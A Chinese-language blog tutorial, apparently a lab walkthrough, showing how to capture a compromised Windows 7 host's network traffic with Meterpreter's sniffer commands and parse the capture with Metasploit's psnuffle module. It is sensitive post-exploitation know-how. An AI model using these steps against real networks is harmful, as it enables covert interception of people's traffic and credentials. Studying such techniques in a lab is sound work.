<返回更多

内网渗透 -- 捕获内网数据包

2020-07-03    
加入收藏

偶尔适度的放纵一下,是为了继续道貌岸然的生活,太急了会没有故事,太缓了会没有人生。。。。

---- 网易云热评

环境:小攻:Kali 2020,ip:192.168.1.133

小受:win7 x86,ip:192.168.1.137

一、生成木马及监听主机参考上篇文章:

二、捕获数据包

1、加载sniffer:load sniffer

2、查看网卡信息:sniffer_interfaces

内网渗透 -- 捕获内网数据包

 

3、开启网卡监听,内容会自动保存到缓存中:sniffer_start 2

4、进入小受,然后随便访问几个网站

内网渗透 -- 捕获内网数据包

 


内网渗透 -- 捕获内网数据包

 

4、将捕获到数据保存下来,默认保存地址/root

sniffer_dump 2 aiyou.cap

内网渗透 -- 捕获内网数据包

 

5、启动wireshark,打开保存下来的文件

内网渗透 -- 捕获内网数据包

 


内网渗透 -- 捕获内网数据包

 

三、通过解包模块解包

1、选择解包模块

use auxiliary/sniffer/psnuffle

2、查看需要设置的参数

show options

内网渗透 -- 捕获内网数据包

 

3、设置解包文件路径

set pcapfile /root/2.cap

4、运行,run,可以查看到我们刚才访问的地址

内网渗透 -- 捕获内网数据包

 

 

声明:本站部分内容来自互联网,如有版权侵犯或其他问题请与我们联系,我们将立即删除或处理。
▍相关推荐
更多资讯 >>>